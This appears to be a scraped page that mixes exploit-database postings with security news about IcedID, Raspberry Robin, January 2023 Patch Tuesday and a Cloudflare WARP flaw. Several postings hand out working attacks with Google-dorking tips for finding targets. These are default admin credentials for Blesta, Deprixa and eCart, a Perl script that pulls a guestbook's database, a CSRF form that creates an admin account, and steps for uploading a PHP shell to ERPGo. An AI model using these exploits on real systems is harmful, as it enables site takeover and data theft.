Deprixa Pro version 7.5 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : DEPRIXA Pro V7.5 Insecure Settings Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://deprixacargo.link/                                                                                         |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=09731 [+] https://127.0.0.1/deprixaprosite/demo/login.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Deprixa Pro 7.5 Insecure Settings

Blesta version 5.4.1 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : blesta 5.4.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://account.blesta.com/client/plugin/download_manager/client_main/download/209/blesta-5.4.1.zip                |  | # Dork      : Powered by Blesta, © Phillips Data, Inc.                                                                           |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=password [+] https://127.0.0.1/blesta/admin/login/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Blesta 5.4.1 Insecure Settings

A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access.
"Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host," Cybereason researchers said in

Active Directory / Malware

A recent IcedID malware attack enabled the threat actor to compromise the Active Directory domain of an unnamed target less than 24 hours after gaining initial access.

"Throughout the attack, the attacker followed a routine of recon commands, credential theft, lateral movement by abusing Windows protocols, and executing Cobalt Strike on the newly compromised host," Cybereason researchers said in a report published this week.

IcedID, also known by the name BokBot, started its life as a banking trojan in 2017 before evolving into a dropper for other malware, joining the likes of Emotet, TrickBot, Qakbot, Bumblebee, and Raspberry Robin.

Attacks involving the delivery of IcedID have leveraged a variety of methods, especially in the wake of Microsoft's decision to block macros from Office files downloaded from the web.

The intrusion detailed by Cybereason is no different in that the infection chain begins with an ISO image file contained within a ZIP archive that culminates in the execution of the IcedID payload.

The malware then establishes persistence on the host via a scheduled task and communicates with a remote server to download additional payloads, including Cobalt Strike Beacon for follow-on reconnaissance activity.

It also carries out lateral movement across the network and executes the same Cobalt Strike Beacon in all those workstations, and then proceeds to install Atera agent, a legitimate remote administration tool, as a redundant remote access mechanism.

"Utilizing IT tools like this allows attackers to create an additional 'backdoor' for themselves in the event their initial persistence mechanisms are discovered and remediated," the researchers said. "These tools are less likely to be detected by antivirus or EDR and are also more likely to be written off as false positives."

The Cobalt Strike Beacon is further used as a conduit to download a C# tool dubbed Rubeus for credential theft, ultimately permitting the threat actor to move laterally to a Windows Server with domain admin privileges.

The elevated permissions are then weaponized to stage a DCSync attack, allowing the adversary to simulate the behavior of a domain controller (DC) and retrieve credentials from other domain controllers.

Other tools used as part of the attack include a legitimate utility named netscan.exe to scan the network for lateral movement as well as the rclone file syncing software to exfiltrate directories of interest to the MEGA cloud storage service.

The findings come as researchers from Team Cymru shed more light on the BackConnect (BC) protocol used by IcedID to deliver additional functionality post compromise, including a VNC module that provides a remote-access channel.

"In the case of BC, there appears to be two operators managing the overall process within distinct roles," the researchers noted last month, adding "much of the activity \[...\] occurs during the typical working week."

The development also follows a report from Proofpoint in November 2022 that a resurgence in Emotet activity has been linked to the distribution of a new version of IcedID.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

IcedID Malware Strikes Again: Active Directory Domain Compromised in Under 24 Hours

2ad Guestbook version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : 2ad guestbook version 2.0 Database Disclosure Exploit                                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://www.2ad.free.fr                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (livre-or.mdbsmdb.mdb ) file  
    The (livre-or.mdbsmdb.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# 2ad guestbook version 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor :  http://www.2ad.free.fr

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] 2ad guestbook version 2.0 Database Disclosure Exploit [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="db/livre-or.mdbsmdb.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/livre-or.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/livre-or.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

2ad Guestbook 2.0 Database Disclosure

Categories: Exploits and vulnerabilities
Categories: News
Tags: patch Tuesday

Tags:  CVE-2023-21674

Tags:  APLC

Tags:  CVE-2023-21743

Tags:  Sharepoint

Tags:  CVE-2023-21563

Tags:  BitLocker

The second Tuesday of the year brings us many updates, including one for an actively exploited vulnerability that could lead to elevation of privileges



(Read more...)




The post Update now! Patch Tuesday January 2023 includes one actively exploited vulnerability appeared first on Malwarebytes Labs.

The first Microsoft Patch Tuesday of 2023 is an important one to start of the year with. In total 98 vulnerabilities were patched, including 11 that were labelled critical and one that is being actively exploited in the wild.

This is also the last time we expect to see fixes for Windows 8.1 included, since the support for Windows 8.1 ended January 10, 2023.

**ALPC**

Let’s start with the vulnerability that was found to be actively exploited in the wild. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The actively exploited vulnerability is listed as CVE-2023-21674.

The flaw is an Elevation of Privilege  (EoP) vulnerability in the Windows Advanced Local Procedure Call (ALPC). ALPC is an inter-process communication (IPC) facility provided by the Microsoft Windows kernel. The ALPC is an ideal attack surface for EoP vulnerabilities since it helps client processes communicate with server processes. So a vulnerability in this facility could be used to give a malicious client process the permissions of a service process, which are often SYSTEM privileges.

An EoP vulnerability by itself is not always of much use to an attacker, unless they can use the gained privileges to further compromise the target system. So it is likely that is has been spotted in the wild in combination or in a chain with other vulnerabilities.

The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its catalog of actively exploited vulnerabilities, urging federal agencies to apply patches by January 31, 2023.

**SharePoint Server**

Another vulnerability that deserves your immediate attention if you’re a Microsoft SharePoint Server user, is listed as CVE-2023-21743—a SharePoint Server security feature bypass vulnerability. In a network-based attack, an unauthenticated attacker could bypass authentication and make an anonymous connection. According to Microsofts’ description, exploitation is more likely and exploitation requires no user interaction.

It is very important to note that users have to trigger a SharePoint upgrade action, which is included in this update, to protect their SharePoint farm. The upgrade action can be triggered by running the SharePoint Products Configuration Wizard, the _Upgrade-SPFarm_ PowerShell cmdlet, or the "_psconfig.exe -cmd upgrade -inplace b2b_" command on each SharePoint server after installing the update.

**BitLocker**

Another interesting one, albeit only for those that use BitLocker, is CVE-2023-21563, a BitLocker security feature bypass vulnerability. BitLocker is a Windows volume encryption technology that protects your data from unauthorized access by encrypting your drive. Many travellers and remote workers trust BitLocker to keep sensitive data safe from prying eyes in case a laptop is lost or stolen. This flaw allows a successful attacker to bypass the BitLocker Device Encryption feature on the system storage device. Which means an attacker with physical access to the target system could exploit this vulnerability to gain access to encrypted data.

**Other updates**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** released four patches to fix vulnerabilities in Acrobat and Reader, InDesign, InCopy, and Dimension software.

**Cisco** released security updates for its IP Phone 7800 and 8800 phones.

**Fortinet** published its monthly advisory covering issues in several of their products.

**Google** patched 60 vulnerabilities in the first Android update of 2023

**Intel** published a oneAPI Toolkit software advisory.

**SAP** published 12 new and updated patches.

**Synology** issued an advisory about a vulnerability that allows remote attackers to execute arbitrary commands through a susceptible version of VPN Plus Server.

Update now! Patch Tuesday January 2023 includes one actively exploited vulnerability

A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.
Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance,

A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.

Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities.

Given its use multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it's suspected to be a pay-per-install (PPI) botnet capable of serving next-stage payloads.

Raspberry Robin, notably, employs infected USB drives as a propagation mechanism and leverages breached QNAP network-attached storage (NAS) devices as first-level command-and-control (C2).

Cybersecurity firm SEKOIA said it was able to identify at least eight virtual private servers (VPSs) hosted on Linode that function as a second C2 layer that likely act as forward proxies to the next as-yet-unknown tier.

"Each compromised QNAP seems to act as a validator and forwarder," the France-based company said. "If the received request is valid, it is redirected to an upper level of infrastructure."

The attack chain thus unfolds as follows: When a user inserts the USB drive and launches a Windows shortcut (.LNK) file, the msiexec utility is launched, which, in turn, downloads the main obfuscated Raspberry Robin payload from the QNAP instance.

This reliance on msiexec to send out HTTP requests to fetch the malware makes it possible to hijack such requests to download another rogue MSI payload either by DNS hijacking attacks or purchasing previously known domains after their expiration.

One such domain is tiua\[.\]uk, which was registered in the early days of the campaign in late July 2021 and used as a C2 between September 22, 2021, and November 30, 2022, when it was suspended by the .UK registry.

"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," the company said, adding it observed several victims, indicating "it was still possible to repurpose a Raspberry Robin domain for malicious activities."

The exact origins of how the first wave of Raspberry Robin USB infections took place remain currently unknown, although it's suspected that it may have been achieved by relying on other malware to disseminate the worm.

This hypothesis is evidenced by the presence of a .NET spreader module that's said to be responsible for distributing Raspberry Robin .LNK files from infected hosts to USB drives. These .LNK files subsequently compromise other machines via the aforementioned method.

The development comes days after Google's Mandiant disclosed that the Russia-linked Turla group reused expired domains associated with ANDROMEDA malware to deliver reconnaissance and backdoor tools to targets compromised by the latter in Ukraine.

"Botnets serve multiple purposes and can be reused and/or remodeled by their operators or even hijacked by other groups over time," the researcher said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors

support_uri parameter in the WARP client local settings file (mdm.xml) lacked proper validation which allowed for privilege escalation and launching an arbitrary executable on the local machine upon clicking on the "Send feedback" option. An attacker with access to the local file system could use a crafted XML config file pointing to a malicious file or set a local path to the executable using Cloudflare Zero Trust Dashboard (for Zero Trust enrolled clients).

**Impact**

support\_uri parameter in the WARP client local settings file (mdm.xml) lacked proper validation which allowed for privilege escalation and launching an arbitrary executable on the local machine upon clicking on the "Send feedback" option. An attacker with access to the local file system could use a crafted XML config file pointing to a malicious file or set a local path to the executable using Cloudflare Zero Trust Dashboard (for Zero Trust enrolled clients).

**Patches**

Upgrade to the latest version (>=2022.12.476.0)

**References**

Cloudflare WARP  
Release notes

CVE-2022-4428: support_uri validation missing in WARP client for Windows

Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://medisensecrm.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] infected file : /Add-User1.php .[+] save code as poc.html .<h2>Add New User</h2>    <form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">    <h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>    <h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>    <h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>    <h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">    <input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>    <input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  </div>  </form>    </div></div>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Medisense-Healthcare Solutions CRM 2.0 Cross Site Request Forgery

ERPGo SaaS CRM version 3.3 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : ERPGo SaaS CRM v3.3 Arbitrary File Upload Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426           |  | # Dork      : "ERPGo SaaS" login                                                                                                 |                "All In One Business ERP With Project, Account, HRM, CRM"                                                          |“Attention is the new currency”  The more effortless the writing looks, the more effort the writer actually put into the process.  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account [+] Go to your membership profile and upload a malicious file instead of an image <===| https://erpgo.127.0.0.1/erpgo-saas/profile[+] Your Ev!l = https://erpgo.127.0.0.1/erpgo-saas/storage/uploads/avatar/zip_1671699428.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

ERPGo SaaS CRM 3.3 Arbitrary File Upload

eCart Web version 4.0.0 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : eCart Web v4.0.0- Multi Vendor eCommerce Marketplace Insecure Settings Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/ecart-web-multi-vendor-ecommerce-marketplace/33201609                                  |  | # Dork      : Copyright © 2022 Made By WRTEAM.                                                                                   |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin123[+] https://127.0.0.1.com/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Tag

#windows